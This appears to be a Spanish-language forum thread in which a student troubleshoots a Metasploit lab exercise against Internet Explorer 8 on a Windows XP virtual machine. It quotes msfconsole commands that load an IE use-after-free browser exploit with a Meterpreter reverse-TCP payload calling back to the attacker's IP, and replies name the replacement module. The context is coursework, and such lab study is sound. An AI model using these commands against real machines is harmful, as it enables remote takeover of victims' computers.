METASPLOIT - ie_cdwnbindinfo error

Iniciado por Pedro_madrid, 5 Enero 2013, 20:55 PM

0 Miembros y 1 Visitante están viendo este tema.

Pedro_madrid

Muy buenas:
Debido a que tengo que realizar una práctica para la asignatura de seguridad me puse con el 0day recinte que salió para IE8.
Ejecutándolo todo bajo máquinas virtuales, la víctima sobre windows xp sp3 con IE8 y el atacante usando backtrack y metasploit; me da un error y cierra IE.
Metasploit queda en Sending HTML...
Error de IE:

AppName: iexplore.exe AppVer: 8.0.6001.18702 ModName: msvcrt.dll
ModVer: 7.0.2600.5512 Offset: 00035ee2

¿Alguien sabe a qué puede ser debido?
PD:
Código usado en msfconsole:

use exploit/windows/browser/ie_cdwnbindinfo_uaf
set SRVHOST ip_del_atacante
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST ip_del_atacante
exploit

Pedro_madrid

Solucionado, parece ser que han eliminado ese módulo.
El actual es: exploit/windows/browser/ie_execcommand_uaf

Falso Positivo

la próxima vez que te suceda esto prueba cambiando el payload
Don't worry, be hacked....

Pedro_madrid

Cita de: Falso Positivo en 15 Enero 2013, 16:37 PM
la próxima vez que te suceda esto prueba cambiando el payload
Ok. Muchas gracias